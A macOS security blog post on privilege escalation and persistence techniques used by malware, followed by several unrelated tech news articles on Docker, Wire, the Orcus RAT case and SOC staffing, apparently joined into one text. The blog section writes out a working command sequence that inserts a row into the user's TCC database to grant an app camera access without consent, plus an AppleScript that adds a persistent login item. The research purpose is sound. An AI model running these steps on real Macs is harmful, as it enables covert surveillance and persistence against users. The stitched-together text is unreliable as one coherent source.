Privilege Escalation | macOS Malware & The Path to Root Part 2

Among security researchers and bug bounty hunters, obtaining unauthorized elevated privileges – privilege escalation – is widely held as the hackers holy grail; an achievement that can be paved with gold as bounty programs, private zero day hoarders and pwn2own-style competitions reward such exploits with handsome amounts of hard cash. As we saw in Part I, Apple’s regular product security updates are frequently littered with a variety of arbitrary code execution and privilege escalation vulnerabilities found by researchers both public and private. Despite this, the vulnerabilities and exploits discovered by researchers are not widely used in the wild by macOS threat actors, and that is largely because they have found other ways to the same end. In this post, we continue our look at the role of privilege escalation on macOS from the point of view of malware developers and how they take a different path.

image privilege escalation part 2

Where’s the Harm in Asking?

Much of the commodity malware and adware seen on macOS doesn’t avail itself of the kind of exploits that lead to privilege escalation that we looked at last time. That’s not only because the exploits typically have a limited shelf life. It’s also not time well-spent. Most users, incredibly but not surprisingly, will happily give elevated privileges if you only ask! 

This direct route to elevation is party engendered by the fact that Mac users are conditioned by both frequency and repetition to seeing authorization requests when they install or move applications, move or copy files or programs from one location to another outside of their home folders, and now – more than ever – to grant applications access rights to many common system services such as Contacts, Calendars, Photos and such like, something we’ll discuss below in detail.

Examples of “ask and hope” are easy to find among macOS commodity adware and malware; in fact, they are the norm, precisely because users are easily socially engineered into installing some program or opening some file that they believe is going to be useful, informative or otherwise beneficial to what they are currently doing. 

Malware developers, PUPs/PUAs and adware make regular use of the built in Installer.app and .pkg file format, just like legitimate apps. They know that most users will click through the installer wizard and never stop to check the installer.log to see what is really going on, let alone use a tool like Suspicious Package to inspect what the package contains.

image of suspicious package

Below is just one example of a common malicious installer.

image of PUP ADWARE installer
image of installer log

Genuine uses of the API that requests elevated permissions do not expose the password to the calling process, but malware authors typically just fake the dialog box and capture the password in plain text, which is easy to do.

image fake installer dialog box

It’s also fairly simple to use a bit of AppleScript to spoof a user into supplying a password with a pretty genuine-looking dialog box that even imports legitimate native icons for added authenticity:

image spoof password
image of spoof script

And sometimes, even asking for root isn’t required. Famously, in the initial public release of macOS 10.13 High Sierra, an error allowed anyone to unlock a protected System Preferences pane simply with the username root and an empty password (the flaw was fixed in macOS 10.13.1)!

Abusing Dialog Alerts – Can Click, Will Click

Legitimate requests for privileges or access to protected resources have always been highly uninformative, conditioning users to either take on trust that the process is benign or risk losing some desired functionality. 

Aware of this, Apple have recently made changes to Security & Privacy preferences, adding the requirement that for notarized apps, developers must provide an informative description to be displayed in the request dialog if they intend to access these protected resources.

While the intention is good, it’s unlikely that this extra “hoop” for legitimate developers to jump through will make any difference to malware authors. First, there’s no check on what information the developer provides, only that they provide some kind of description string. Second, even Apple’s own description strings are hardly any less confusing. For example, what could it possibly mean to most users to say one application will be able to access documents and data in Terminal.app? The Terminal app isn’t typically thought of as a location for storing documents and data, so that description is at best confusing to users. Likely, we suspect it means one app will have access to documents and data within the sandbox container of the other app, but even if correct that is hardly helpful. What the implications are of that are left entirely for the user to find out the hard way: by clicking one of the buttons and finding out.

image of terminal app dialog

The result of that is the requirement to provide a description string isn’t really likely to be that helpful in judging whether it’s an action the user wants to take or not. Thirdly, and perhaps anecdotally, most people agree that such messages even when presented with useful text are rarely even read before the click or button press has been made. Double that effect when the messages come thick and fast and are perceived as a hindrance to productivity.

Who Needs Sudo When The User is Admin?

Another reason why attackers on macOS don’t worry unduly about elevating privileges to root is that by far and away the majority of macOS users are running as the default user that was setup when they first bought or were given their Mac. That default user is, of course, an admin user. The id command will quickly tell a process what access its user has.

image of id utility

A process generally has the privileges of the user who launches it, so clearly when the user is admin – as most are – that gives the process a lot of power to make changes, launch other processes and access resources.


For example, until Mojave, any user launched process could – without requesting any further interaction from the user – read the user’s email database, including encrypted emails, exfiltrate the browser’s entire browsing history and much more besides. These have supposedly been locked down, but various bypasses have already been revealed (see here and here, for example) and they are largely null and void in any case as soon as a user adds the Terminal to Full Disk Access, something that anyone who uses the Terminal is almost certainly going to do.

Any Hack Dropbox Can Do, Zoom Can Do Better

Which brings us to ways that malware authors can access protected resources even without asking. To tell this story, we need to pivot away from malicious developers to legitimate ones for a moment. 

Back in 2016, in my Revealing Dropbox’s dirty little security hack and a subsequent post, I exposed how Dropbox hacks System Preferences to forcibly insert itself into the Accessibility preferences pane giving itself permission to take control of the User Interface, regardless of what choices the user made in System Preferences.

image of dropbox hack

This hack was itself seen in various adware, PUP/PUAs and malware exploit kits. Following a lot of exposure on hacker news and elsewhere, Apple took exception to this, and with the release of macOS Sierra a few months later locked down the TCC database that acts as the backing store for those rights. 

With Mojave and Catalina, Apple added further controls to user privacy, again backed by the TCC SQLite database, including restricting access to the system camera and microphone. 

Beginning in macOS Mojave, users have to consent before an app can access the camera or microphone. And then macOS Catalina further requires consent to record the contents of your screen or the keys that you type on your keyboard.

Importantly, while Apple have made it possible to pre-approve some of the privacy preferences either at the user level or by Mac Admins using MDM configuration profiles, they stressed in WWDC 2019 that access to the camera and microphone could only be pre-denied. Access to these resources could only be acquired at “time of use” through user approval: clicking an ‘Allow’ or ‘Deny’ button in a dialog that pops when the resource is requested by an application.

Enter Zoom into the story. You may remember Zoom were recently in the news regarding using a hidden web server, which it turned out, could easily be hijacked by malicious actors to enable a user’s camera without their permission. It seems the controversy has not made the company any less shy about abusing loophole’s in Apple’s security, albeit in a bid to provide a better experience for its users. Last week, Zoom hit the news again as a document they published themselves shows they had found and implemented another simple bypass to the Camera and Microphone permissions. 

Credits here go to Github user bp88 who developed an entire script for Jamf Pro users wanting to emulate the same effect, but let’s walk through it step by step to see how it works. Let’s use the Calculator.app, clearly something that does not require access to the Camera, for this demo. 

First we have to gather a little information about the app we want to sneak into Privacy preferences, including its bundle identifier and code signature requirements.

$ plutil -p /System/Applications/Calculator.app/Contents/Info.plist | grep -i bundleidentifier

This returns com.apple.Calculator.

We also need it’s code signing requirements in hex form. To get those, we use codesign to extract the requirements.

$ codesign -d -r- /Applications/Calculator.app

Which returns the following:

image if codesign utility

We only want the part after designated  =>. We echo that into the csreq util, which will give us a binary output that we’ll save to a temp file.

$ echo 'identifier "com.apple.calculator" and anchor apple' | csreq -r -b /tmp/req.bin

Using xxd and tr, we take the binary file and convert it into the hex “blob” that the TCC.db expects.

$ xxd -p /tmp/req.bin | tr -d 'n'

We’ll wrap that blob inside X' ' as required by the database syntax.

X'fade0c000000003000000001000000060000000200000014636f6d2e6170706c652e63616c63756c61746f7200000003'.

Finally we need a time stamp, which we can grab with 

$ date +"%s"

All we need to do now is construct our sqlite command based on the database’s schema and execute it.

$ sqlite3 ~/Library/Application Support/com.apple.TCC/TCC.db "INSERT INTO access (service,client,client_type,allowed,prompt_count,csreq,last_modified) VALUES('kTCCServiceCamera', 'com.apple.calculator', '0', '1', '1', X'fade0c000000003000000001000000060000000200000014636f6d2e6170706c652e63616c63756c61746f7200000003', 1573637690)"

gif image of zoom hack

While this is more of a horizontal privilege escalation – meaning, the level of rights remains the same, but the hack allows access to other resources that would normally require further user approval – it nevertheless demonstrates how macOS’s built-in security can easily be bypassed at the user level and without resorting to exploiting low-level vulnerabilities. Expect to see this hack used in the wild by RATs and other malware interested in hijacking the camera and microphone resources. 

Persistence Doesn’t Require Elevated Privileges

If you’ve ever logged in to a Mac only to unexpectedly find that some unwanted app launches itself and slows down the login process, you’ve just experienced the fact that apps don’t need permission or authentication to start up at user login time. With persistence being one of the major objectives of all malware, this is a feature that is widely abused.

There are several ways that apps can ensure they execute on login and before the user takes control of the Desktop, none of which require the application to obtain permission. 

First of all, an app can simply install itself into the Login Items list in System Preferences. Although use of this kind of persistence mechanism is formally deprecated, it’s still widely used and can even be done with a simple AppleScript.

tell application "System Events"
	name of every login item
	if (login item "Persistent App" exists) is false then
		tell application process "Persistent App" to set aPath to POSIX path of its application file as string
		make new login item at end of login items with properties {path:aPath, hidden:false, kind:"Application", name:"Persistent App"}
	end if
end tell


Second, the mechanism that is now officially recommended by Apple to replace deprecated Login Items actually makes it more difficult for users to review and manage. Login Items are now hidden within each application’s own bundle and are entirely managed within the application itself. Apple kindly point out to developers that the older API, unlike the new preferred mechanism, exposes their login item to user interference.

image of login item documentation

As we’ve mentioned before it is possible to enumerate which items are using Login Items, but this requires either writing custom code or running a script, which I’ve previously shared here.

Another root to persistence that does not require the malware authors to engage in privilege escalation techniques is to simply write a LaunchAgent to the user’s Library folder. The LaunchAgents folder does not require permissions to write to, and is by far and away the most prevalent persistence method used on the Mac by malware. That’s largely because most users have no idea that this folder exists – not helped by the fact that Apple chose to hide it by default from 10.7 onwards – and most wouldn’t know what was safe or dangerous to do with it even if they did.

Despite that, given the explosion in adware over the last couple of years, the role of LaunchAgents has started to attract a little more attention as adware infected users turn to community forums seeking help. That in turn has led to a small but rising use of the old cron technologies, which even fewer modern users are aware of. These still function reliably on all versions of macOS right up to and including macOS 10.15 Catalina.

Notice how in this example the malware explicitly calls sudo which throws a permission request to the user as they log in, without explanation other than “confup wants to make changes”. Given the recent rash of infections we’re seeing of this particular item, it’s clearly successful.

image cron reboot

Conclusion

Despite the active and perhaps competitive race among researchers to find the latest path to root, it is rare to see the kind of privilege escalation exploits they develop being actively used in the wild by attackers. What accounts for this disjunction between research and practice is the fact that there are multiple ways for malware authors to achieve their objectives with simpler and more durable techniques. Sometimes, as we’ve seen, privilege escalation isn’t even required and where it is, social engineering or just a plain ask will often do the trick. While unpatched zero days will always be in the armoury of advanced attackers, for the majority of crimeware, they are rarely needed.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Mirantis acquires Docker Enterprise

Mirantis today announced that it has acquired Docker’s Enterprise business and team. Docker Enterprise was very much the heart of Docker’s product lineup, so this sale leaves Docker as a shell of its former, high-flying unicorn self. Docker itself, which installed a new CEO earlier this year, says it will continue to focus on tools that will advance developers’ workflows. Mirantis will keep the Docker Enterprise brand alive, though, which will surely not create any confusion.

With this deal, Mirantis is acquiring Docker Enterprise Technology Platform and all associated IP: Docker Enterprise Engine, Docker Trusted Registry, Docker Unified Control Plane and Docker CLI. It will also inherit all Docker Enterprise customers and contracts, as well as its strategic technology alliances and partner programs. Docker and Mirantis say they will both continue to work on the Docker platform’s open-source pieces.

The companies did not disclose the price of the acquisition, but it’s surely nowhere near Docker’s valuation during any of its last funding rounds. Indeed, it’s no secret that Docker’s fortunes changed quite a bit over the years, from leading the container revolution to becoming somewhat of an afterthought after Google open-sourced Kubernetes and the rest of the industry coalesced around it. It still had a healthy enterprise business, though, with plenty of large customers among the large enterprises. The company says about a third of Fortune 100 and a fifth of Global 500 companies use Docker Enterprise, which is a statistic most companies would love to be able to highlight — and which makes this sale a bit puzzling from Docker’s side, unless the company assumed that few of these customers were going to continue to bet on its technology.

Update: for reasons only known to Docker’s communications team, we weren’t told about this beforehand, but the company also today announced that it has raised a $35 million funding round from Benchmark. This doesn’t change the overall gist of the story below, but it does highlight the company’s new direction.

Here is what Docker itself had to say. “Docker is ushering in a new era with a return to our roots by focusing on advancing developers’ workflows when building, sharing and running modern applications. As part of this refocus, Mirantis announced it has acquired the Docker Enterprise platform business,” Docker said in a statement when asked about this change. “Moving forward, we will expand Docker Desktop and Docker Hub’s roles in the developer workflow for modern apps. Specifically, we are investing in expanding our cloud services to enable developers to quickly discover technologies for use when building applications, to easily share these apps with teammates and the community, and to run apps frictionlessly on any Kubernetes endpoint, whether locally or in the cloud.”

Mirantis itself, too, went through its ups and downs. While it started as a well-funded OpenStack distribution, today’s Mirantis focuses on offering a Kubernetes-centric on-premises cloud platform and application delivery. As the company’s CEO Adrian Ionel told me ahead of today’s announcement, today is possibly the most important day for the company.

So what will Mirantis do with Docker Enterprise? “Docker Enterprise is absolutely aligned and an accelerator of the direction that we were already on,” Ionel told me. “We were very much moving towards Kubernetes and containers aimed at multi-cloud and hybrid and edge use cases, with these goals to deliver a consistent experience to developers on any infrastructure anywhere — public clouds, hybrid clouds, multi-cloud and edge use cases — and make it very easy, on-demand, and remove any operational concerns or burdens for developers or infrastructure owners.”

Mirantis previously had about 450 employees. With this acquisition, it gains another 300 former Docker employees that it needs to integrate into its organization. Docker’s field marketing and sales teams will remain separate for some time, though, Ionel said, before they will be integrated. “Our most important goal is to create no disruptions for customers,” he noted. “So we’ll maintain an excellent customer experience, while at the same time bringing the teams together.”

This also means that for current Docker Enterprise customers, nothing will change in the near future. Mirantis says that it will accelerate the development of the product and merge its Kubernetes and lifecycle management technology into it. Over time, it will also offer a managed services solutions for Docker Enterprise.

While there is already some overlap between Mirantis’ and Docker Enterprise’s customer base, Mirantis will pick up about 700 new enterprise customers with this acquisition.

With this, Ionel argues, Mirantis is positioned to go up against large players like VMware and IBM/Red Hat. “We are the one real cloud-native player with meaningful scale to provide an alternative to them without lock-in into a legacy or existing technology stack.”

While this is clearly a day the Mirantis team is celebrating, it’s hard not to look at this as the end of an era for Docker, too. The company says it will share more about its future plans today, but didn’t make any spokespeople available ahead of this announcement.

Atlassian expands Jira Service Desk beyond IT teams

Atlassian today announced a set of new templates and workflows for Jira Service Desk that were purpose-built for HR, legal and facilities teams. Service Desk started six years ago as a version of Jira that was mostly meant for IT departments. Atlassian, however, found that other teams inside the companies that adopted it started to use it as well, including various teams at Twitter and Airbnb, for example. With today’s update, it’s now making it easier for these teams, at least in legal, HR and facilities, to get started with Jira Service Desk without having to customize the product themselves.

“Over the last six years, one of the observations that we’ve made was that we need to provide really good services — the idea that we can provide great services to employees is really something that is really on the rise,” said Edwin Wong, the head of the company’s IT products. “I think in the past, maybe we were a bit more forgiving in terms of what employees expected from services departments. But today you’re just so used to great experiences in your consumer life and when you come to work, you expect the same.”

But lots of service teams, he argues, didn’t have the tools to provide this experience, yet they were looking for tools to streamline their workflows (think onboarding for HR teams, for example) and to move from manual processes to something more automated and modern. Jira was already flexible enough to allow them to do this, but the new set of templates now codifies these processes for them.

Wong stressed this isn’t just about tracking but also managing work across teams and providing them a more centralized hub for information. “One of the big challenges that we’ve seen from many of the customers that we’ve spoken to is the challenge of just figuring out where to go when you want something,” he said. “When I have a new employee, where do I go to ask for a new laptop? Is that the same process as telling my facilities teams that perhaps there is an issue with a bathroom?”

Atlassian is starting with these three templates because that’s where it saw the most immediate need. Over time, I’m sure we’ll see the company get into other verticals as well.

Freshworks raises $150M Series H on $3.5B valuation

Freshworks, a company that makes a variety of business software tools, from CRM to help-desk software, announced a $150 million Series H investment today from Sequoia Capital, CapitalG (formerly Google Capital) and Accel on a hefty $3.5 billion valuation. The late-stage startup has raised almost $400 million, according to Crunchbase data.

The company has been building an enterprise SaaS platform to give customers a set of integrated business tools, but CEO and co-founder Girish Mathrubootham says they will be investing part of this money in R&D to keep building out the platform.

To that end, the company also announced today a new unified data platform called the “Customer-for-Life Cloud” that runs across all of its tools. “We are actually investing in really bringing all of this together to create the “Customer-for-Life Cloud,” which is how you take marketing, sales, support and customer success — all of the aspects of a customer across the entire life cycle journey and bring them to a common data model where a business that is using Freshworks can see the entire life cycle of the customer,” Mathrubootham explained.

While Mathrubootham was not ready to commit to an IPO, he said they are in the process of hiring a CFO and are looking ahead to one day becoming a public company. “We don’t have a definite timeline. We want to go public at the right time. We are making sure that as a company that we are ready with the right processes and teams and predictability in the business,” he said.

In addition, he says he will continue to look for good acquisition targets, and having this money in the bank will help the company fill in gaps in the product set should the right opportunity arise. “We don’t generally acquire revenue, but we are looking for good technology teams both in terms of talent, as well as technology that would help give us a jumpstart in terms of go-to-market.” It hasn’t been afraid to target small companies in the past, having acquired 12 already.

Freshworks, which launched in 2010, has almost 2,500 employees, a number that’s sure to go up with this new investment. It has 250,000 customers worldwide, including almost 40,000 paying customers. These including Bridgestone Tires, Honda, Hugo Boss, Toshiba and Cisco.

AWS, Salesforce join forces with Linux Foundation on Cloud Information Model

Last year, Adobe, SAP and Microsoft came together and formed the Open Data Initiative. Not to be outdone, this week, AWS, Salesforce and Genesys, in partnership with The Linux Foundation, announced the Cloud Information Model.

The two competing data models have a lot in common. They are both about bringing together data and applying a common open model to it. The idea is to allow for data interoperability across products in the partnership without a lot of heavy lifting, a common problem for users of these big companies’ software.

Jim Zemlin, executive director at The Linux Foundation, says this project provides a neutral home for the Cloud Information model, where a community can work on the problem. “This allows for anyone across the community to collaborate and provide contributions under a central governance model. It paves the way for full community-wide engagement in data interoperability efforts and standards development, while rapidly increasing adoption rate of the community,” Zemlin explained in a statement.

Each of the companies in the initial partnership is using the model in different ways. AWS will use it in conjunction with its AWS Lake Formation tool to help customers move, catalog, store and clean data from a variety of data sources, while Genesys customers can use its cloud and AI products to communicate across a variety of channels.

Patrick Stokes from Salesforce says his company is using the Cloud Information Model as the underlying data model for his company’s Customer 360 platform of products. “We’re super excited to announce that we’ve joined together with a few partners — AWS, Genesys and The Linux Foundation — to actually open-source that data model,” Stokes told TechCrunch.

Of course, now we have two competing “open” data models, and it’s going to create some friction until the two competing projects find a way to come together. The fact is that many companies use tools from each of these companies, and if there continues to be these competing approaches, it’s going to defeat the purpose of creating these initiatives in the first place.

As Satya Nadella said in 2015, “It is incumbent upon us, especially those of us who are platform vendors to partner broadly to solve real pain points our customers have.” If that’s the case, having competing models is not really achieving that.

Messaging app Wire confirms $8.2M raise, responds to privacy concerns after moving holding company to the US

Big changes are afoot for Wire, an enterprise-focused end-to-end encrypted messaging app and service that advertises itself as “the most secure collaboration platform”. In February, Wire quietly raised $8.2 million from Morpheus Ventures and others, we’ve confirmed — the first funding amount it has ever disclosed — and alongside that external financing, it moved its holding company in the same month to the US from Luxembourg, a switch that Wire’s CEO Morten Brogger described in an interview as “simple and pragmatic.”

He also said that Wire is planning to introduce a freemium tier to its existing consumer service — which itself has half a million users — while working on a larger round of funding to fuel more growth of its enterprise business — a key reason for moving to the US, he added: There is more money to be raised there.

“We knew we needed this funding and additional to support continued growth. We made the decision that at some point in time it will be easier to get funding in North America, where there’s six times the amount of venture capital,” he said.

While Wire has moved its holding company to the US, it is keeping the rest of its operations as is. Customers are licensed and serviced from Wire Switzerland; the software development team is in Berlin, Germany; and hosting remains in Europe.

The news of Wire’s US move and the basics of its February funding — sans value, date or backers — came out this week via a blog post that raises questions about whether a company that trades on the idea of data privacy should itself be more transparent about its activities.

Specifically, the changes to Wire’s financing and legal structure were only communicated to users when news started to leak out, which brings up questions not just about transparency, but about the state of Wire’s privacy policy, given the company’s holding company now being on US soil.

It was an issue picked up and amplified by NSA whistleblower Edward Snowden . Via Twitter, he described the move to the US as “not appropriate for a company claiming to provide a secure messenger — claims a large number of human rights defenders relied on.”

The key question is whether Wire’s shift to the US puts users’ data at risk — a question that Brogger claims is straightforward to answer: “We are in Switzerland, which has the best privacy laws in the world” — it’s subject to Europe’s General Data Protection Regulation framework (GDPR) on top of its own local laws — “and Wire now belongs to a new group holding, but there no change in control.” 

In its blog post published in the wake of blowback from privacy advocates, Wire also claims it “stands by its mission to best protect communication data with state-of-the-art technology and practice” — listing several items in its defence:

  • All source code has been and will be available for inspection on GitHub (github.com/wireapp).
  • All communication through Wire is secured with end-to-end encryption — messages, conference calls, files. The decryption keys are only stored on user devices, not on our servers. It also gives companies the option to deploy their own instances of Wire in their own data centers.
  • Wire has started working on a federated protocol to connect on-premise installations and make messaging and collaboration more ubiquitous.
  • Wire believes that data protection is best achieved through state-of-the-art encryption and continues to innovate in that space with Messaging Layer Security (MLS).

But where data privacy and US law are concerned, it’s complicated. Snowden famously leaked scores of classified documents disclosing the extent of US government mass surveillance programs in 2013, including how data-harvesting was embedded in US-based messaging and technology platforms.

Six years on, the political and legal ramifications of that disclosure are still playing out — with a key judgement pending from Europe’s top court which could yet unseat the current data transfer arrangement between the EU and the US.

Privacy versus security

Wire launched at a time when interest in messaging apps was at a high watermark. The company made its debut in the middle of February 2014, and it was only one week later that Facebook acquired WhatsApp for the princely sum of $19 billion.

We described Wire’s primary selling point at the time as a “reimagining of how a communications tool like Skype should operate had it been built today” rather than in in 2003. That meant encryption and privacy protection, but also better audio tools and file compression and more.

It was a pitch that seemed especially compelling considering the background of the company. Skype co-founder Janus Friis and funds connected to him were the startup’s first backers (and they remain the largest shareholders);Wire was co-founded in by Skype alums Jonathan Christensen and Alan Duric (no longer with the company); and even new investor Morpheus has Skype roots.

Yet even with that Skype pedigree, the strategy faced a big challenge.

“The consumer messaging market is lost to the Facebooks of the world, which dominate it,” Brogger said today. “However, we made a clear insight, which is the core strength of Wire: security and privacy.”

That, combined with trend around the consumerization of IT that’s brought new tools to business users, is what led Wire to the enterprise market in 2017 — a shift that’s seen it pick up a number of big names among its 700 enterprise customers, including Fortum, Aon, EY and SoftBank Robotics.

But fast forward to today, and it seems that even as security and privacy are two sides of the same coin, it may not be so simple when deciding what to optimise in terms of features and future development, which is part of the question now and what critics are concerned with.

“Wire was always for profit and planned to follow the typical venture backed route of raising rounds to accelerate growth,” one source familiar with the company told us. “However, it took time to find its niche (B2B, enterprise secure comms).

“It needed money to keep the operations going and growing. [But] the new CEO, who joined late 2017, didn’t really care about the free users, and the way I read it now, the transformation is complete: ‘If Wire works for you, fine, but we don’t really care about what you think about our ownership or funding structure as our corporate clients care about security, not about privacy.’”

And that is the message you get from Brogger, too, who describes individual consumers as “not part of our strategy”, but also not entirely removed from it, either, as the focus shifts to enterprises and their security needs.

Brogger said there are still half a million individuals on the platform, and they will come up with ways to continue to serve them under the same privacy policies and with the same kind of service as the enterprise users. “We want to give them all the same features with no limits,” he added. “We are looking to switch it into a freemium model.”

On the other side, “We are having a lot of inbound requests on how Wire can replace Skype for Business,” he said. “We are the only one who can do that with our level of security. It’s become a very interesting journey and we are super excited.”

Part of the company’s push into enterprise has also seen it make a number of hires. This has included bringing in two former Huddle C-suite execs, Brogger as CEO and Rasmus Holst as chief revenue officer — a bench that Wire expanded this week with three new hires from three other B2B businesses: a VP of EMEA sales from New Relic, a VP of finance from Contentful; and a VP of Americas sales from Xeebi.

Such growth comes with a price-tag attached to it, clearly. Which is why Wire is opening itself to more funding and more exposure in the US, but also more scrutiny and questions from those who counted on its services before the change.

Brogger said inbound interest has been strong and he expects the startup’s next round to close in the next two to three months.

Orcus RAT Author Charged in Malware Scheme

In July 2016, KrebsOnSecurity published a story identifying a Toronto man as the author of the Orcus RAT, a software product that’s been marketed on underground forums and used in countless malware attacks since its creation in 2015. This week, Canadian authorities criminally charged him with orchestrating an international malware scheme.

An advertisement for Orcus RAT.

The accused, 36-year-old John “Armada” Revesz, has maintained that Orcus is a legitimate “Remote Administration Tool” aimed at helping system administrators remotely manage their computers, and that he’s not responsible for how licensed customers use his product.

In my 2016 piece, however, several sources noted that Armada and his team were marketing it more like a Remote Access Trojan, providing ongoing technical support and help to customers who’d purchased Orcus but were having trouble figuring out how to infect new machines or hide their activities online.

Follow-up reporting revealed that the list of features and plugins advertised for Orcus includes functionality that goes significantly beyond what one might see in a traditional remote administration tool, such as DDoS-for-hire capabilities, and the ability to disable the light indicator on webcams so as not to alert the target that the RAT is active.

Canadian investigators don’t appear to be buying Revesz’ claims. On Monday the Royal Canadian Mounted Police (RCMP) announced it had charged Revesz with operating an international malware distribution scheme under the company name “Orcus Technologies.”

“An RCMP criminal investigation began in July 2016 after reports of a significant amount of computers were being infected with a ‘Remote Access Trojan’ type of virus,” the agency said in a statement.

The RCMP filed the charges eight months after executing a search warrant at Revesz’ home, where they seized several hard drives containing Orcus RAT customer names, financial transactions, and other information.

“The evidence obtained shows that this virus has infected computers from around the world, making thousands of victims in multiple countries,” the RCMP said.

Revesz did not respond to requests for comment.

If Revesz’s customers are feeling the heat right now, they probably should be. Several former customers of his took to Hackforums[.]net to complain about being raided by investigators who are trying to track down individuals suspected of using Orcus to infect computers with malware.

“I got raided [and] within the first 5 minutes they mention Orcus to me,” complained one customer on Hackforums[.]net, the forum where Revesz principally advertised his software. That user pointed to a March 2019 media advisory released by the Australian Federal Police, who said they’d executed search warrants there as part of an investigation into RAT technology conducted in tandem with the RCMP.

According to Revesz himself, the arrests and searches related to Orcus have since expanded to individuals in the United States and Germany.

The sale and marketing of remote administration tools is not illegal in the United States, and indeed there are plenty such tools sold by legitimate companies to help computer experts remotely administer computers.

However, these tools tend to be viewed by prosecutors as malware and spyware when their proprietors advertise them as hacking devices and provide customer support aimed at helping buyers deploy the RATs stealthily and evade detection by anti-malware programs.

Last year, a 21-year-old Kentucky man pleaded guilty to authoring and distributing a popular hacking tool called “LuminosityLink,” which experts say was used by thousands of customers to gain access to tens of thousands of computers across 78 countries worldwide.

Also in 2018, 27-year-old Arkansas resident Taylor Huddleston was sentenced to three years in jail for making and selling the “NanoCore RAT,” which was being used to spy on webcams and steal passwords from systems running the software.

In many previous law enforcement investigations targeting RAT developers and sellers, investigators also have targeted customers of these products. In 2014, the U.S. Justice Department announced a series of actions against more than 100 people accused of purchasing and using “Blackshades,” a cheap and powerful RAT that the U.S. government said was used to infect more than a half million computers worldwide.

It’s remarkable how many denizens of various hacking forums persist in believing that an end-user licensing agreement (EULA) or “terms of service” (TOS) disavowing any responsibility for what customers do with the product somehow absolves sellers of RAT programs of any liability when they then turn around and actively assist customers in using the tools to infect systems with malware.

Stop the Churn, Avoid Burnout | How To Keep Your Cybersecurity Personnel

According to recent research, the global cybersecurity workforce, currently estimated to be close to 3 million people, needs to grow by around 4 million or 62% in order to meet current demand. The shortage of cyber manpower has significant impact not only on organizations, which struggle to fill the ranks, but also security professionals, who have to cope with the pressures brought by understaffing. There are many indications that these professionals, who are in such high demand, suffer from stress, intensive workload and are likely to replace their current employer for a better paying job tomorrow.

Eight out of ten analysts say their SOC had experienced between 10% and 50% analyst churn in the past year. What are the reasons for these high churn rates, and what could a security manager do in order to combat this phenomenon? Let’s take a look.

image of stop the churn

Security is a Stressful Profession

In a <a href="survey covering the first 6 months of 2019, some 1500 of 6000 (25%) cybersecurity professionals said their organization had been the victim of a data breach, and 2160 (36%) of those who had not been breached believed their organization could currently be facing a breach without their knowledge.

In the light of such pressures, it’s perhaps not a great surprise that almost half (49%) of those surveyed reported that they are kept awake at night worrying about their organization’s cybersecurity.

On top of worries about imminent threats, staff also report that a lack of security awareness among their organization’s staff in general and a lack of buy-in regarding security best practices at the executive level contribute to increasing stress. Of major concern to cybersecurity professionals is that it is more often than not C-Suite executives that are most likely to disregard security safeguards, the very people most likely to be targeted in spearphishing and advanced threat actor attacks. 

Increased Workload Due to Lack of Manpower

66% of respondents claim that the cybersecurity skills shortage has resulted in an increased workload on existing staff. Since organizations don’t have enough people, they simply pile more work onto those that they have. This leads to human error, misalignment of tasks to skills, and employee burnout.

69% of organisations say their cybersecurity teams are understaffed, and 17% of professionals said that they had considered leaving their current position due to a lack of resources.

The average enterprise SOC encounters anything between 10,000 and a million alerts per day. Many of these alerts are false positives. One survey found that more than half of respondents reported a rate of 50% or higher. Most now say they spend the majority of their time trying to manage the high volume of alerts.

Alert fatigue (a term coined by medical professionals) is now widely associated with passive detection and response security technologies. It causes stress, reduces productivity and, over time, leads to the psychological effects of depression and apathy. Obviously, these can greatly effect an employee’s will to remain in their position.  

What Can You Do To Retain Your Cybersecurity Staff?

The cybersecurity profession is fairly new, and it lacks a common, industry-wide, professional framework for career progression. However, there are still a wide-variety of respected certification programs, training courses and skills development platforms, not to mention an increasing number of hacker/security cons where training courses are often run alongside the presentation of papers and products. Despite the wealth of available resources, nearly half of surveyed SOC analysts say they get 20 or fewer hours of training per year. 

 

Invest In Skills To Keep Your People, & Improve Enterprise Security

Organizations would be wise to invest in building their teams’ professional knowledge. This could be achieved by periodic training at Cyber-ranges, tabletop exercises or on-prem simulations. Allowing staff to attend professional lectures and encouraging the consumption of professional materials like reverse engineering training and threat intelligence is also a great way to invest in skills.

In some quarters, managers fear that investing in employee training only equips the employee to move on to a more lucrative job elsewhere. Viewed in that light, training can be seen as a cost rather than an investment. The facts, however, suggest otherwise. The main factors employees state for being happy with their current employer is that they are valued by management, constantly challenged to improve their skills, and prefer to advance in position rather than start out somewhere new. 

Investing in skills doesn’t just have the pay-off of stemming churn in your SOC either. It means you’re actively improving the knowledgebase and in-house talent you already possess, which naturally makes a huge contribution to improved organizational security.

Educate Your Business – “Security Aren’t The Bad Guys”

Security analysts are people, and they work with, and provide services to other employees. For a long time, IT security people were perceived as the “bad guys” - technocrats whose interest in securing the organization outweighs their affection for their peers. How else can you explain their demand that you change your password every two weeks, and that they make you come to them to release a file your client has sent you? 

Educating the broader workforce on the importance of cybersecurity, and the fact that these cyber-practitioners are actually securing the entire organization, will go a long way to boost their morale and sense of value to the organization.   

Smarter Tech Works For Everybody

Security managers should invest in implementing the necessary procedures and tools to increase automation, reduce menial work and lower the frequency of alerts. Also, replacing older tech with modern security tools will give analysts professional satisfaction – they now work with the best tools in the business, and a modern UI is so much easier to work with, improving productivity and reducing frustration.   

 

Conclusion

Reducing attrition should be an organizational task. It is tempting to think that technology alone will solve the issue, but it won’t. People are the backbone of the security organization, and will remain such for many years. But given the scarcity of human resources, organizations must ensure that their people are utilized in the best way possible – meaning they are not wasting time chasing false positives or implementing difficult to use products. The people who are already employed must be well trained and equipped with the best tools to allow them to focus on the severe threats the organization is facing. They should also be appreciated throughout the organization. These actions will go a long way to reducing cybersecurity staff churn and improving efficiency and well-being within the business.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Lawyers hate timekeeping — Ping raises $13M to fix it with AI

Counting billable time in six-minute increments is the most annoying part of being a lawyer. It’s a distracting waste. It leads law firms to conservatively under-bill. And it leaves lawyers stuck manually filling out timesheets after a long day when they want to go home to their families.

Life is already short, as Ping CEO and co-founder Ryan Alshak knows too well. The former lawyer spent years caring for his mother as she battled a brain tumor before her passing. “One minute laughing with her was worth a million doing anything else,” he tells me. “I became obsessed with the idea that we spend too much of our lives on things we have no need to do — especially at work.”

